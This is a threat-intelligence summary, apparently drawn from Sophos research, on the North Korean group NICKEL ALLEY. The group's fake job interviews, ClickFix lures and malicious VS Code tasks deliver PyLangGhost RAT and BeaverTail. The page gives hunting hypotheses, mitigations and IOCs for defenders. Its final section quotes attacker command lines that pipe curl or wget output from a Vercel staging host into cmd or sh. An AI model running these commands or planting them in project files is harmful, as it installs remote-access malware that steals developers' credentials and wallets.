Skip to content
.ca
sign in
7 minhigh

NICKEL ALLEY strategy: Fake it ‘til you make it

North Korean threat group NICKEL ALLEY is targeting technology professionals and Web3 developers through fake job interviews and malicious code repositories. The group employs social engineering, the ClickFix tactic, and malicious VS Code tasks to deliver remote access trojans like PyLangGhost RAT and BeaverTail, primarily aiming for cryptocurrency theft and potential supply chain compromise.

Sens:24hConf:highAnalyzed:2026-03-23reports

Authors: Sophos Counter Threat Unit Research Team

ActorsNICKEL ALLEYContagious InterviewPyLangGhost RATGoLangGhost RATBeaverTailOtterCookie
BeaverTailNICKEL ALLEYContagious InterviewPyLangGhost RATClickFix

Source:Sophos

IOCs · 5

Key Takeaways

  • NICKEL ALLEY targets tech professionals using fake job interviews and the 'ClickFix' tactic to deliver PyLangGhost RAT.
  • The group uses malicious GitHub repositories and typosquatted npm packages to compromise developer environments.
  • Recent campaigns leverage malicious VS Code tasks (tasks.json) to automatically execute payload retrieval commands upon opening a project.
  • Vercel is heavily used for hosting malware staging servers to deliver OS-specific payloads like BeaverTail.

Affected Systems

  • Windows
  • macOS
  • Linux
  • Node.js environments
  • Google Chrome (Cryptocurrency wallet extensions)

Attack Chain

The attack begins with social engineering via fake job interviews or poisoned npm/GitHub repositories. Victims are tricked into executing a 'ClickFix' command or opening a malicious VS Code project, which triggers payload retrieval using tools like curl, wget, or Node.js fetch. The downloaded payload is extracted and executed, launching a VBScript that uses a renamed Python executable to run PyLangGhost RAT or directly evaluating BeaverTail malware. Once active, the malware exfiltrates browser credentials, targets cryptocurrency wallet extensions, and establishes persistence for potential supply chain compromise.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: SophosLabs

SophosLabs has developed proprietary detections for this threat (e.g., Troj/PySteal-AW, Troj/PyAgent-AS), but no raw detection rules or queries are provided in the article.

Detection Engineering Assessment

EDR Visibility: High — EDRs can easily monitor process creation events, such as wscript.exe spawning cmd.exe, renamed binaries executing .py files, and curl/wget piping to shells. Network Visibility: Medium — Network traffic to Vercel or GitHub is encrypted (HTTPS) and hosted on legitimate platforms, making it hard to distinguish from normal developer activity without SSL inspection or specific URL path monitoring. Detection Difficulty: Moderate — While the initial access relies on user interaction and legitimate tools (VS Code, npm, curl), the subsequent process chains (e.g., wscript running tar or renamed Python binaries) are highly anomalous and detectable.

Required Log Sources

  • Process Creation (Event ID 4688)
  • Sysmon Event ID 1 (Process Creation)
  • Sysmon Event ID 11 (File Create)
  • Sysmon Event ID 22 (DNSEvent)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for curl or wget commands piping output directly to cmd.exe or sh, especially originating from developer tools like VS Code.Process CreationExecutionMedium
Search for wscript.exe or cscript.exe executing scripts from the %TEMP% directory, followed by the execution of cmd.exe and tar.exe.Process CreationExecutionLow
Identify instances of cmd.exe launching an executable that is not named python.exe but passes a .py file as an argument (e.g., csshost.exe nvidia.py).Process CreationDefense EvasionLow
Monitor for Node.js processes executing eval() on data retrieved from external network connections, particularly to Vercel domains.Process Creation / Network ConnectionsExecutionMedium

Control Gaps

  • Lack of restrictions on executing scripts from the %TEMP% directory.
  • Implicit trust in developer tools (VS Code, npm) and platforms (Vercel, GitHub).

Key Behavioral Indicators

  • Renamed python.exe executing scripts
  • VS Code tasks.json containing curl/wget commands
  • wscript.exe spawning cmd.exe to run tar.exe

False Positive Assessment

  • Medium. Detections based purely on developer tools (npm, VS Code, curl, Vercel) may generate false positives due to their widespread legitimate use. High-fidelity alerts require correlating these tools with anomalous process chains (e.g., renamed Python binaries or execution from %TEMP%).

Recommendations

Immediate Mitigation

  • Block known malicious domains and IPs associated with NICKEL ALLEY.
  • Search endpoint telemetry for the execution of 'csshost.exe' or suspicious '.py' files like 'nvidia.py' or 'audiodriver.py'.

Infrastructure Hardening

  • Implement application control to prevent the execution of unapproved binaries from the %TEMP% directory.
  • Restrict the use of 'curl' and 'wget' on Windows endpoints where they are not strictly required.

User Protection

  • Deploy EDR solutions to monitor process ancestry, specifically focusing on developer tools like VS Code and Node.js.
  • Enforce the use of hardware security keys for cryptocurrency wallets to mitigate the impact of credential theft.

Security Awareness

  • Train developers and HR personnel on the 'Contagious Interview' tactic and fake job offers.
  • Educate developers on the risks of cloning untrusted GitHub repositories and running 'npm install' without reviewing the code, including hidden configurations like '.vscode/tasks.json'.

MITRE ATT&CK Mapping

  • T1566.002 - Phishing: Spearphishing Link
  • T1189 - Drive-by Compromise
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.005 - Command and Scripting Interpreter: Visual Basic
  • T1059.007 - Command and Scripting Interpreter: JavaScript/JScript
  • T1036.003 - Masquerading: Rename System Utilities
  • T1140 - Deobfuscate/Decode Files or Information
  • T1552.001 - Unsecured Credentials: Credentials In Files
  • T1539 - Steal Web Session Cookie
  • T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools

Additional IOCs

  • Domains:
    • astrabytesync[[.]]com - Fake company website operated by NICKEL ALLEY
    • chainlink-api-v3[[.]]com - NICKEL ALLEY malware staging server
  • Urls:
    • hxxps://github[[.]]com/astrasbytesyncs/web3-social-platform - GitHub repository operated by NICKEL ALLEY
    • hxxps://rgg-vercel[[.]]vercel[[.]]app/api/data - NICKEL ALLEY malware staging server
    • hxxps://ake-test[[.]]vercel[[.]]app/api/data - NICKEL ALLEY malware staging server
    • hxxps://astrahub[[.]]vercel[[.]]app/api/data - NICKEL ALLEY malware staging server
    • hxxps://rgg-test[[.]]vercel[[.]]app/api/data - NICKEL ALLEY malware staging server
    • hxxps://astraluck-vercel[[.]]vercel[[.]]app/api/dat - NICKEL ALLEY malware staging server
    • hxxps://github[[.]]com/mishalepo/test-project - GitHub repository used by NICKEL ALLEY for social engineering and malware delivery
  • File Hashes:
    • 52f173a760db5d68e52ba1f1ac51c023 (MD5) - VBScript file used by NICKEL ALLEY (start.vbs)
    • 2151d4d7dc8d6dca7242928a17ea3fb14f58ccef (SHA1) - VBScript file used by NICKEL ALLEY (start.vbs)
    • 5e307ef3aa9f20d963382700173530cdc455c1523631bbe22ede3710a2a30373 (SHA256) - VBScript file used by NICKEL ALLEY (start.vbs)
    • de05ecc9f0136246d0160923108026660eee06e6 (SHA1) - PyLangGhost RAT used by NICKEL ALLEY (nvidia.py)
    • 1b42fc77155bd78b098e0b72440dd72d6154312569e6ba46f1e5dc94b31c6b42 (SHA256) - PyLangGhost RAT used by NICKEL ALLEY (nvidia.py)
    • a55629dc112ee133ac8dba80549cb0c7 (MD5) - VBScript file used by NICKEL ALLEY (update.vbs)
    • 0f010280ee2a91a57b0edf8f18c0091ce741d4e7 (SHA1) - VBScript file used by NICKEL ALLEY (update.vbs)
    • 5ee13db6a646a9de00bbeec6030677e412bfeecdca226b1ff035e07927970ce0 (SHA256) - VBScript file used by NICKEL ALLEY (update.vbs)
    • 1d652e7ab71621c7245bfbf84bacdc3e (MD5) - PyLangGhost RAT used by NICKEL ALLEY (audiodriver.py)
    • ac26ecf52002d87f3ba89f9e1b0742eed9e75e3d (SHA1) - PyLangGhost RAT used by NICKEL ALLEY (audiodriver.py)
    • 58c1e49c67e5b7bcf10d30e370685d10c2fa263f24b8d099a97005c7a35f1346 (SHA256) - PyLangGhost RAT used by NICKEL ALLEY (audiodriver.py)
  • File Paths:
    • .vscode\\tasks.json - VS Code configuration file abused to execute malware retrieval commands upon opening a folder.
    • %TEMP%\\<fake_fix>.zip - Archive file dropped into the TEMP directory during the ClickFix infection chain.
    • csshost.exe - Renamed python.exe binary used to execute PyLangGhost RAT.
  • Command Lines:
    • Purpose: Download and extract a malicious archive as part of the ClickFix tactic. | Tools: curl, powershell, wscript | Stage: Execution
    • Purpose: Extract benign library files using the tar utility via VBScript. | Tools: cmd, tar | Stage: Execution | cmd.exe /c tar -xf <path>\\Lib.zip
    • Purpose: Execute the PyLangGhost RAT using a renamed Python executable. | Tools: cmd, python | Stage: Execution | cmd /c csshost.exe nvidia.py
    • Purpose: Retrieve and execute a payload via VS Code tasks on Windows. | Tools: curl, cmd | Stage: Execution | curl https://vscode-ext-git.vercel.app/api/w?token=KJASDFKWER | cmd
    • Purpose: Retrieve and execute a payload via VS Code tasks on Linux/macOS. | Tools: wget, sh | Stage: Execution | wget -qO- 'https://vscode-ext-git.vercel.app/api/l?token=KJASDFKWER' | sh

Related